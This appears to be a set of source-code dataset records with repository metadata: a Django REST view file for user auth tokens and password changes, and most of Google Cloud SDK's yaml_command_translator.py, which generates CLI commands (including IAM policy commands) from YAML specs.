"post_process": {"func": bokeh_warnings_graphs.update_json_and_bokeh,
"args": ["project_code", "html_path", "warn_ids_path"]},
}
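A hedged sketch of a direct call into this module; every path below is an illustrative placeholder (the rvt_model_services runner normally supplies these arguments):

cmd_journal(
    project_code='xyz',
    model_path=r'C:\models\project_xyz.rvt',
    jrn_path=r'C:\journals\warnings_xyz.jrn',
    com_dir=r'C:\rvt_model_services\commands',
    log_dir=r'C:\rvt_model_services\logs',
)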
|
[
"dt12345/"
] |
dt12345/
|
bfc99b6aaa87e38884ff8ecff55930f0c7a1bcef
|
494d020f266ed4dc063264914d24d96bf2b69dc8
|
/build/lib/modules/users/views_api.py
|
92e72d8580d9f34822fb783aa649d000904efb77
|
[] |
no_license
|
diy01/flerken_two
|
2914260f3881fedeecdc075ad4e5e746f6bbed01
|
e2b97e284da9e203dafb5ac62658f2435fd95d55
|
refs/heads/master
| 2020-05-25T11:20:59.767825
| 2019-05-05T09:06:01
| 2019-05-21T06:04:24
| 187,778,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,188
|
py
|
from django.contrib import auth
from django.contrib.auth.models import User
from django.db import transaction
from django_filters.rest_framework.backends import DjangoFilterBackend
from rest_framework import filters
from rest_framework import parsers, renderers
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.response import Response
from rest_framework.views import APIView
from modules.users.serializers import UserSerializer
from utils.base import BaseListCreateAPIView, content
from utils.base_exception import APIValidateException
class UserToken(APIView):
throttle_classes = ()
permission_classes = ()
parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = AuthTokenSerializer
def get(self, request, *args, **kwargs):
if not request.user.username:
            return Response({'detail': u'User not authenticated'}, status.HTTP_401_UNAUTHORIZED)
token, created = Token.objects.get_or_create(user=request.user)
return Response({'token': token.key})
class UpdateUserToken(APIView):
throttle_classes = ()
permission_classes = ()
parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = AuthTokenSerializer
@transaction.atomic()
@content
def post(self, request, *args, **kwargs):
if not request.user.username:
            return Response({'detail': u'User not authenticated'}, status.HTTP_401_UNAUTHORIZED)
Token.objects.filter(user_id=request.user.id).delete()
token, created = Token.objects.get_or_create(user=request.user)
return Response({'token': token.key})
class ChangeUserPwd(BaseListCreateAPIView):
"""
    Change the user's password.
    Input parameters:
        * old_password -- current password (required)
        * password -- new password (required)
"""
paginate_by = None
queryset = User.objects.all()
filter_backends = (DjangoFilterBackend, filters.SearchFilter,)
serializer_class = UserSerializer
def get(self, request, *args, **kwargs):
        raise APIValidateException(u'GET is not allowed', status_code=status.HTTP_405_METHOD_NOT_ALLOWED)
def _allowed_methods(self):
return ['PATCH', 'HEAD', 'OPTIONS']
@transaction.atomic()
@content
def patch(self, request, *args, **kwargs):
        data = {'success': True, 'msg': u'Password changed successfully'}
username = request.user.username
password = request.data.get('password')
old_password = request.data.get('old_password')
if not password:
            raise APIValidateException(u'password must not be empty')
user = auth.authenticate(username=username, password=old_password)
if not user:
            raise APIValidateException(u'Old password is incorrect')
user.set_password(password)
user.save()
        self.changeLog(user.id, user.username, u'Changed password')
return Response(data)
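A hedged client-side sketch of the password-change endpoint above, using `requests`; the URL and token are illustrative placeholders rather than values from this project:

import requests

resp = requests.patch(
    'http://localhost:8000/api/users/change_pwd/',  # hypothetical route
    json={'old_password': 'old-secret', 'password': 'new-secret'},
    headers={'Authorization': 'Token <your-token>'},  # DRF token auth
)
print(resp.status_code, resp.json())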
|
[
"810625951@qq.com"
] |
810625951@qq.com
|
4b1878e479a9fc19e774caab707557cf99dfb680
|
d98883fe1007111b8795ac5661e56758eca3b62e
|
/google-cloud-sdk/lib/googlecloudsdk/command_lib/util/apis/yaml_command_translator.py
|
39f73cc678f03999817c4b609c29aaea7f039637
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
pyDeb/KindnessCafe
|
7303464e3c0693b0586a4a32740d8b9b19299caf
|
6ff8dfe338aefd986edf67c382aff1a2920945d1
|
refs/heads/master
| 2022-12-29T16:16:35.796387
| 2021-04-19T00:03:14
| 2021-04-19T00:03:14
| 243,533,146
| 3
| 4
| null | 2022-12-08T09:48:09
| 2020-02-27T14:01:16
|
Python
|
UTF-8
|
Python
| false
| false
| 45,199
|
py
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A yaml to calliope command translator.
Calliope allows you to register a hook that converts a yaml command spec into
a calliope command class. The Translator class in this module implements that
interface and provides generators for a yaml command spec. The schema for the
spec can be found in yaml_command_schema.yaml.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import json
from apitools.base.protorpclite import messages as apitools_messages
from apitools.base.py import encoding
from apitools.base.py.exceptions import HttpBadRequestError
from googlecloudsdk.api_lib.util import waiter
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import command_loading
from googlecloudsdk.command_lib.iam import iam_util
from googlecloudsdk.command_lib.util import completers
from googlecloudsdk.command_lib.util.apis import arg_marshalling
from googlecloudsdk.command_lib.util.apis import arg_utils
from googlecloudsdk.command_lib.util.apis import registry
from googlecloudsdk.command_lib.util.apis import update
from googlecloudsdk.command_lib.util.apis import yaml_command_schema
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import resources
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.resource import resource_transform
import six
class Translator(command_loading.YamlCommandTranslator):
"""Class that implements the calliope translator interface."""
def Translate(self, path, command_data):
spec = yaml_command_schema.CommandData(path[-1], command_data)
c = CommandBuilder(spec, path)
return c.Generate()
class DeclarativeIamRolesCompleter(completers.ListCommandCompleter):
"""An IAM role completer for a resource argument.
The Complete() method override bypasses the completion cache.
Attributes:
_get_resource_ref: DeclarativeArgumentGenerator.GetRequestResourceRef method
to parse the resource ref.
"""
def __init__(self, get_resource_ref, **kwargs):
super(DeclarativeIamRolesCompleter, self).__init__(**kwargs)
self._get_resource_ref = get_resource_ref
def GetListCommand(self, parameter_info):
resource_ref = self._get_resource_ref(parameter_info.parsed_args)
resource_uri = resource_ref.SelfLink()
return [
'iam', 'list-grantable-roles', '--quiet', '--flatten=name',
'--format=disable', resource_uri
]
def Complete(self, prefix, parameter_info):
"""Bypasses the cache and returns completions matching prefix."""
command = self.GetListCommand(parameter_info)
items = self.GetAllItems(command, parameter_info)
return [
item for item in items or []
if item is not None and item.startswith(prefix)
]
class CommandBuilder(object):
"""Generates calliope commands based on the yaml spec."""
IGNORED_FLAGS = {'project'}
def __init__(self, spec, path):
self.spec = spec
self.path = path
self.method = registry.GetMethod(
self.spec.request.collection, self.spec.request.method,
self.spec.request.api_version)
resource_arg = self.spec.arguments.resource
self.arg_generator = arg_marshalling.DeclarativeArgumentGenerator(
self.method,
self.spec.arguments.params,
resource_arg)
self.display_resource_type = self.spec.request.display_resource_type
if (not self.display_resource_type
and resource_arg and not resource_arg.is_parent_resource):
self.display_resource_type = resource_arg.name if resource_arg else None
def Generate(self):
"""Generates a calliope command from the yaml spec.
Raises:
ValueError: If we don't know how to generate the given command type (this
is not actually possible right now due to the enum).
Returns:
calliope.base.Command, The command that implements the spec.
"""
if self.spec.command_type == yaml_command_schema.CommandType.DESCRIBE:
command = self._GenerateDescribeCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.LIST:
command = self._GenerateListCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.DELETE:
command = self._GenerateDeleteCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.CREATE:
command = self._GenerateCreateCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.WAIT:
command = self._GenerateWaitCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.GET_IAM_POLICY):
command = self._GenerateGetIamPolicyCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.SET_IAM_POLICY):
command = self._GenerateSetIamPolicyCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.ADD_IAM_POLICY_BINDING):
command = self._GenerateAddIamPolicyBindingCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.REMOVE_IAM_POLICY_BINDING):
command = self._GenerateRemoveIamPolicyBindingCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.UPDATE:
command = self._GenerateUpdateCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.GENERIC:
command = self._GenerateGenericCommand()
else:
raise ValueError('Command [{}] unknown command type [{}].'.format(
' '.join(self.path), self.spec.command_type))
self._ConfigureGlobalAttributes(command)
return command
def _GenerateDescribeCommand(self):
"""Generates a Describe command.
A describe command has a single resource argument and an API method to call
to get the resource. The result is returned using the default output format.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.DescribeCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
def Run(self_, args):
unused_ref, response = self._CommonRun(args)
return self._HandleResponse(response, args)
return Command
def _GenerateListCommand(self):
"""Generates a List command.
A list command operates on a single resource and has flags for the parent
collection of that resource. Because it extends the calliope base List
command, it gets flags for things like limit, filter, and page size. A
list command should register a table output format to display the result.
If arguments.resource.response_id_field is specified, a --uri flag will also
be enabled.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.ListCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
# Remove the URI flag if we don't know how to generate URIs for this
# resource.
if not self.spec.response.id_field:
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
self._RegisterURIFunc(args)
unused_ref, response = self._CommonRun(args)
return self._HandleResponse(response, args)
return Command
def _GenerateDeleteCommand(self):
"""Generates a Delete command.
A delete command has a single resource argument and an API to call to
perform the delete. If the async section is given in the spec, an --async
flag is added and polling is automatically done on the response. For APIs
that adhere to standards, no further configuration is necessary. If the API
uses custom operations, you may need to provide extra configuration to
describe how to poll the operation.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.DeleteCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
def Run(self_, args):
ref, response = self._CommonRun(args)
if self.spec.async_:
response = self._HandleAsync(
args,
ref,
response,
request_string='Delete request issued for: [{{{}}}]'
.format(yaml_command_schema.NAME_FORMAT_KEY),
extract_resource_result=False)
if args.async_:
return self._HandleResponse(response, args)
response = self._HandleResponse(response, args)
log.DeletedResource(self._GetDisplayName(ref, args),
kind=self.display_resource_type)
return response
return Command
def _GenerateCreateCommand(self):
"""Generates a Create command.
A create command has a single resource argument and an API to call to
perform the creation. If the async section is given in the spec, an --async
flag is added and polling is automatically done on the response. For APIs
that adhere to standards, no further configuration is necessary. If the API
uses custom operations, you may need to provide extra configuration to
describe how to poll the operation.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.CreateCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
if self.spec.arguments.labels:
labels_util.AddCreateLabelsFlags(parser)
def Run(self_, args):
ref, response = self._CommonRun(args)
is_parent_resource = (self.spec.arguments.resource and
self.spec.arguments.resource.is_parent_resource)
if self.spec.async_:
if ref is not None and not is_parent_resource:
request_string = 'Create request issued for: [{{{}}}]'.format(
yaml_command_schema.NAME_FORMAT_KEY)
else:
request_string = 'Create request issued'
response = self._HandleAsync(
args, ref, response,
request_string=request_string)
if args.async_:
return self._HandleResponse(response, args)
if is_parent_resource:
# Data on responses from operation polling is stored in
# additionalProperties, so convert to dict for consistent behavior.
response_obj = encoding.MessageToDict(response)
# If the response is an operation that has a 'response' property that
# has a name, use that. Otherwise, use the 'name' property.
full_name = response_obj.get('response', {}).get('name')
if not full_name:
full_name = response_obj.get('name')
resource_name = resource_transform.TransformBaseName(full_name)
else:
resource_name = self._GetDisplayName(ref, args)
log.CreatedResource(resource_name, kind=self.display_resource_type)
response = self._HandleResponse(response, args)
return response
return Command
def _GenerateWaitCommand(self):
"""Generates a wait command for polling operations.
A wait command takes an operation reference and polls the status until it
is finished or errors out. This follows the exact same spec as in other
async commands except the primary operation (create, delete, etc) has
already been done. For APIs that adhere to standards, no further async
configuration is necessary. If the API uses custom operations, you may need
to provide extra configuration to describe how to poll the operation.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
def Run(self_, args):
ref = self.arg_generator.GetRequestResourceRef(args)
response = self._WaitForOperation(
ref, resource_ref=None, extract_resource_result=False,
args=args)
response = self._HandleResponse(response, args)
return response
return Command
@property
def _add_condition(self):
return self.spec.iam and self.spec.iam.enable_condition
def _GenerateGetIamPolicyCommand(self):
"""Generates a get-iam-policy command.
A get-iam-policy command has a single resource argument and an API method
to call to get the resource. The result is returned using the default
output format.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.ListCommand):
"""Get IAM policy command closure."""
@staticmethod
def Args(parser):
self._CommonArgs(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
_, response = self._CommonRun(args)
return self._HandleResponse(response, args)
return Command
def _GenerateSetIamPolicyCommand(self):
"""Generates a set-iam-policy command.
A set-iam-policy command takes a resource argument, a policy to set on that
resource, and an API method to call to set the policy on the resource. The
result is returned using the default output format.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
"""Set IAM policy command closure."""
@staticmethod
def Args(parser):
self._CommonArgs(parser)
iam_util.AddArgForPolicyFile(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
"""Called when command is executed."""
# Default Policy message and set IAM request message field names
policy_type_name = 'Policy'
policy_request_path = 'setIamPolicyRequest'
        # Use Policy message and set IAM request field name overrides for APIs
# with non-standard naming (if provided)
if self.spec.iam:
policy_type_name = (self.spec.iam.message_type_overrides['policy'] or
policy_type_name)
policy_request_path = (self.spec.iam.set_iam_policy_request_path or
policy_request_path)
policy_field_path = policy_request_path + '.policy'
policy_type = self.method.GetMessageByName(policy_type_name)
if not policy_type:
raise ValueError('Policy type [{}] not found.'.format(
policy_type_name))
policy, update_mask = iam_util.ParsePolicyFileWithUpdateMask(
args.policy_file, policy_type)
self.spec.request.static_fields[policy_field_path] = policy
self._SetPolicyUpdateMask(update_mask)
try:
ref, response = self._CommonRun(args)
except HttpBadRequestError as ex:
log.err.Print(
'ERROR: Policy modification failed. For bindings with conditions'
', run "gcloud alpha iam policies lint-condition" to identify '
'issues in conditions.'
)
raise ex
iam_util.LogSetIamPolicy(ref.Name(), self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _GenerateDeclarativeIamRolesCompleter(self):
"""Generate a IAM role completer."""
get_resource_ref = self.arg_generator.GetRequestResourceRef
class Completer(DeclarativeIamRolesCompleter):
def __init__(self, **kwargs):
super(Completer, self).__init__(
get_resource_ref=get_resource_ref, **kwargs)
return Completer
def _GenerateAddIamPolicyBindingCommand(self):
"""Generates an add-iam-policy-binding command.
    An add-iam-policy-binding command adds a binding to an IAM policy. A
binding consists of a member, a role to define the role of the member, and
an optional condition to define in what condition the binding is valid.
Two API methods are called to get and set the policy on the resource.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
"""Add IAM policy binding command closure."""
@staticmethod
def Args(parser):
iam_util.AddArgsForAddIamPolicyBinding(
parser,
role_completer=self._GenerateDeclarativeIamRolesCompleter(),
add_condition=self._add_condition)
self._CommonArgs(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
"""Called when command is executed."""
        # Use Policy message and set IAM request field name overrides for APIs
# with non-standard naming (if provided)
policy_request_path = 'setIamPolicyRequest'
if self.spec.iam:
policy_request_path = (
self.spec.iam.set_iam_policy_request_path or policy_request_path)
policy_field_path = policy_request_path + '.policy'
policy = self._GetModifiedIamPolicyAddIamBinding(
args, add_condition=self._add_condition)
# override policy version
if self.spec.iam and self.spec.iam.policy_version:
policy.version = self.spec.iam.policy_version
self.spec.request.static_fields[policy_field_path] = policy
try:
ref, response = self._CommonRun(args)
except HttpBadRequestError as ex:
log.err.Print(
'ERROR: Policy modification failed. For a binding with condition'
', run "gcloud alpha iam policies lint-condition" to identify '
'issues in condition.'
)
raise ex
iam_util.LogSetIamPolicy(ref.Name(), self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _GenerateRemoveIamPolicyBindingCommand(self):
"""Generates a remove-iam-policy-binding command.
    A remove-iam-policy-binding command removes a binding from an IAM policy. A
binding consists of a member, a role to define the role of the member, and
an optional condition to define in what condition the binding is valid.
Two API methods are called to get and set the policy on the resource.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
"""Remove IAM policy binding command closure."""
@staticmethod
def Args(parser):
iam_util.AddArgsForRemoveIamPolicyBinding(
parser,
role_completer=self._GenerateDeclarativeIamRolesCompleter(),
add_condition=self._add_condition)
self._CommonArgs(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
"""Called when command is executed."""
        # Use Policy message and set IAM request field name overrides for APIs
# with non-standard naming (if provided)
policy_request_path = 'setIamPolicyRequest'
if self.spec.iam:
policy_request_path = (
self.spec.iam.set_iam_policy_request_path or policy_request_path)
policy_field_path = policy_request_path + '.policy'
policy = self._GetModifiedIamPolicyRemoveIamBinding(
args, add_condition=self._add_condition)
# override policy version
if self.spec.iam and self.spec.iam.policy_version:
policy.version = self.spec.iam.policy_version
self.spec.request.static_fields[policy_field_path] = policy
ref, response = self._CommonRun(args)
iam_util.LogSetIamPolicy(ref.Name(), self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _GenerateGenericCommand(self):
"""Generates a generic command.
A generic command has a resource argument, additional fields, and calls an
API method. It supports async if the async configuration is given. Any
fields is message_params will be generated as arguments and inserted into
the request message.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
# pylint: disable=missing-docstring
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
def Run(self_, args):
ref, response = self._CommonRun(args)
if self.spec.async_:
request_string = None
if ref:
request_string = 'Request issued for: [{{{}}}]'.format(
yaml_command_schema.NAME_FORMAT_KEY)
response = self._HandleAsync(
args, ref, response, request_string=request_string)
return self._HandleResponse(response, args)
return Command
def _GenerateUpdateCommand(self):
"""Generates an update command.
An update command has a resource argument, additional fields, and calls an
API method. It supports async if the async configuration is given. Any
    fields in message_params will be generated as arguments and inserted into
the request message.
Currently, the Update command is the same as Generic command.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
# pylint: disable=missing-docstring
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
if self.spec.arguments.labels:
labels_util.AddUpdateLabelsFlags(parser)
def Run(self_, args):
# Check if mask is required for an update request, if required, return
# the dotted path, e.g updateRequest.fieldMask.
mask_path = update.GetMaskFieldPath(self.method)
if mask_path:
# If user sets to disable the auto-generated field mask, set the value
# to the empty string instead so that custom hooks can be used.
if self.spec.update and self.spec.update.disable_auto_field_mask:
mask_string = ''
else:
mask_string = update.GetMaskString(args, self.spec, mask_path)
self.spec.request.static_fields[mask_path] = mask_string
# Check if the update is full-update, which requires a get request.
existing_message = None
if self.spec.update:
if self.spec.update.read_modify_update:
existing_message = self._GetExistingResource(args)
ref, response = self._CommonRun(args, existing_message)
if self.spec.async_:
request_string = None
if ref:
request_string = 'Request issued for: [{{{}}}]'.format(
yaml_command_schema.NAME_FORMAT_KEY)
response = self._HandleAsync(
args, ref, response, request_string=request_string)
log.UpdatedResource(
self._GetDisplayName(ref, args), kind=self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _CommonArgs(self, parser):
"""Performs argument actions common to all commands.
Adds all generated arguments to the parser
Sets the command output format if specified
Args:
parser: The argparse parser.
"""
args = self.arg_generator.GenerateArgs()
for arg in args:
arg.AddToParser(parser)
if self.spec.arguments.additional_arguments_hook:
for arg in self.spec.arguments.additional_arguments_hook():
arg.AddToParser(parser)
if self.spec.output.format:
parser.display_info.AddFormat(self.spec.output.format)
if self.spec.output.flatten:
parser.display_info.AddFlatten(self.spec.output.flatten)
def _CommonRun(self, args, existing_message=None):
"""Performs run actions common to all commands.
Parses the resource argument into a resource reference
Prompts the user to continue (if applicable)
Calls the API method with the request generated from the parsed arguments
Args:
args: The argparse parser.
existing_message: the apitools message returned from previous request.
Returns:
(resources.Resource, response), A tuple of the parsed resource reference
and the API response from the method call.
"""
ref = self.arg_generator.GetRequestResourceRef(args)
if self.spec.input.confirmation_prompt:
console_io.PromptContinue(
self._Format(self.spec.input.confirmation_prompt, ref,
self._GetDisplayName(ref, args)),
throw_if_unattended=True, cancel_on_no=True)
if self.spec.request.modify_method_hook:
self.spec.request.method = self.spec.request.modify_method_hook(ref, args)
self.method = registry.GetMethod(
self.spec.request.collection, self.spec.request.method,
self.spec.request.api_version)
if self.spec.request.issue_request_hook:
# Making the request is overridden, just call into the custom code.
return ref, self.spec.request.issue_request_hook(ref, args)
if self.spec.request.create_request_hook:
# We are going to make the request, but there is custom code to create it.
request = self.spec.request.create_request_hook(ref, args)
else:
parse_resource = self.spec.request.parse_resource_into_request
request = self.arg_generator.CreateRequest(
args,
self.spec.request.static_fields,
self.spec.request.resource_method_params,
self.spec.arguments.labels,
self.spec.command_type,
use_relative_name=self.spec.request.use_relative_name,
parse_resource_into_request=parse_resource,
existing_message=existing_message,
override_method=self.method)
for hook in self.spec.request.modify_request_hooks:
request = hook(ref, args, request)
response = self.method.Call(request,
limit=self.arg_generator.Limit(args),
page_size=self.arg_generator.PageSize(args))
return ref, response
def _SetPolicyUpdateMask(self, update_mask):
"""Set Field Mask on SetIamPolicy request message.
If the API supports update_masks then adds the update_mask to the
SetIamPolicy request (via static fields).
Args:
update_mask: str, comma separated string listing the Policy fields to be
updated.
"""
# Standard names for SetIamPolicyRequest message and set IAM request
# field name
set_iam_policy_request = 'SetIamPolicyRequest'
policy_request_path = 'setIamPolicyRequest'
# Use SetIamPolicyRequest message and set IAM request field name overrides
    # for APIs with non-standard naming (if provided)
if self.spec.iam:
overrides = self.spec.iam.message_type_overrides
set_iam_policy_request = (overrides['set_iam_policy_request']
or set_iam_policy_request)
policy_request_path = (self.spec.iam.set_iam_policy_request_path
or policy_request_path)
mask_field_path = '{}.updateMask'.format(policy_request_path)
update_request = self.method.GetMessageByName(set_iam_policy_request)
if hasattr(update_request, 'updateMask'):
self.spec.request.static_fields[mask_field_path] = update_mask
def _GetIamPolicy(self, args):
"""GetIamPolicy helper function for add/remove binding."""
get_iam_method = registry.GetMethod(self.spec.request.collection,
'getIamPolicy',
self.spec.request.api_version)
get_iam_request = self.arg_generator.CreateRequest(
args,
use_relative_name=self.spec.request.use_relative_name,
override_method=get_iam_method)
if self.spec.iam and self.spec.iam.policy_version:
arg_utils.SetFieldInMessage(
get_iam_request,
self.spec.iam.get_iam_policy_version_path,
self.spec.iam.policy_version)
policy = get_iam_method.Call(get_iam_request)
return policy
def _GetModifiedIamPolicyAddIamBinding(self, args, add_condition=False):
"""Get the IAM policy and add the specified binding to it.
Args:
args: an argparse namespace.
add_condition: True if support condition.
Returns:
IAM policy.
"""
binding_message_type = self.method.GetMessageByName('Binding')
if add_condition:
condition = iam_util.ValidateAndExtractConditionMutexRole(args)
policy = self._GetIamPolicy(args)
condition_message_type = self.method.GetMessageByName('Expr')
iam_util.AddBindingToIamPolicyWithCondition(
binding_message_type, condition_message_type, policy, args.member,
args.role, condition)
else:
policy = self._GetIamPolicy(args)
iam_util.AddBindingToIamPolicy(binding_message_type, policy, args.member,
args.role)
return policy
def _GetModifiedIamPolicyRemoveIamBinding(self, args, add_condition=False):
"""Get the IAM policy and remove the specified binding to it.
Args:
args: an argparse namespace.
add_condition: True if support condition.
Returns:
IAM policy.
"""
if add_condition:
condition = iam_util.ValidateAndExtractCondition(args)
policy = self._GetIamPolicy(args)
iam_util.RemoveBindingFromIamPolicyWithCondition(
policy, args.member, args.role, condition, all_conditions=args.all)
else:
policy = self._GetIamPolicy(args)
iam_util.RemoveBindingFromIamPolicy(policy, args.member, args.role)
return policy
def _GetExistingResource(self, args):
get_method = registry.GetMethod(self.spec.request.collection, 'get',
self.spec.request.api_version)
get_arg_generator = arg_marshalling.DeclarativeArgumentGenerator(
get_method, [], self.spec.arguments.resource)
# TODO(b/111069150): Add error handling when get fails.
return get_method.Call(get_arg_generator.CreateRequest(args))
def _HandleAsync(self, args, resource_ref, operation,
request_string, extract_resource_result=True):
"""Handles polling for operations if the async flag is provided.
Args:
args: argparse.Namespace, The parsed args.
resource_ref: resources.Resource, The resource reference for the resource
being operated on (not the operation itself)
operation: The operation message response.
request_string: The format string to print indicating a request has been
issued for the resource. If None, nothing is printed.
extract_resource_result: bool, True to return the original resource as
the result or False to just return the operation response when it is
done. You would set this to False for things like Delete where the
resource no longer exists when the operation is done.
Returns:
The response (either the operation or the original resource).
"""
operation_ref = resources.REGISTRY.Parse(
getattr(operation, self.spec.async_.response_name_field),
collection=self.spec.async_.collection)
request_string = self.spec.async_.request_issued_message or request_string
if request_string:
log.status.Print(self._Format(request_string, resource_ref,
self._GetDisplayName(resource_ref, args)))
if args.async_:
log.status.Print(self._Format(
'Check operation [{{{}}}] for status.'
.format(yaml_command_schema.REL_NAME_FORMAT_KEY), operation_ref))
return operation
return self._WaitForOperation(
operation_ref, resource_ref, extract_resource_result, args=args)
def _WaitForOperation(self, operation_ref, resource_ref,
extract_resource_result, args=None):
poller = AsyncOperationPoller(
self.spec, resource_ref if extract_resource_result else None, args)
progress_string = self._Format(
'Waiting for operation [{{{}}}] to complete'.format(
yaml_command_schema.REL_NAME_FORMAT_KEY),
operation_ref)
return waiter.WaitFor(
poller, operation_ref, self._Format(
progress_string, resource_ref,
self._GetDisplayName(resource_ref, args) if args else None))
def _HandleResponse(self, response, args=None):
"""Process the API response.
Args:
response: The apitools message object containing the API response.
args: argparse.Namespace, The parsed args.
Raises:
core.exceptions.Error: If an error was detected and extracted from the
response.
Returns:
A possibly modified response.
"""
if self.spec.response.error:
error = self._FindPopulatedAttribute(
response, self.spec.response.error.field.split('.'))
if error:
messages = []
if self.spec.response.error.code:
messages.append('Code: [{}]'.format(
_GetAttribute(error, self.spec.response.error.code)))
if self.spec.response.error.message:
messages.append('Message: [{}]'.format(
_GetAttribute(error, self.spec.response.error.message)))
if messages:
raise exceptions.Error(' '.join(messages))
raise exceptions.Error(six.text_type(error))
if self.spec.response.result_attribute:
response = _GetAttribute(response, self.spec.response.result_attribute)
for hook in self.spec.response.modify_response_hooks:
response = hook(response, args)
return response
def _FindPopulatedAttribute(self, obj, attributes):
"""Searches the given object for an attribute that is non-None.
This digs into the object search for the given attributes. If any attribute
along the way is a list, it will search for sub-attributes in each item
of that list. The first match is returned.
Args:
obj: The object to search
attributes: [str], A sequence of attributes to use to dig into the
resource.
Returns:
The first matching instance of the attribute that is non-None, or None
      if one could not be found.
"""
if not attributes:
return obj
attr = attributes[0]
try:
obj = getattr(obj, attr)
except AttributeError:
return None
if isinstance(obj, list):
for x in obj:
obj = self._FindPopulatedAttribute(x, attributes[1:])
if obj:
return obj
return self._FindPopulatedAttribute(obj, attributes[1:])
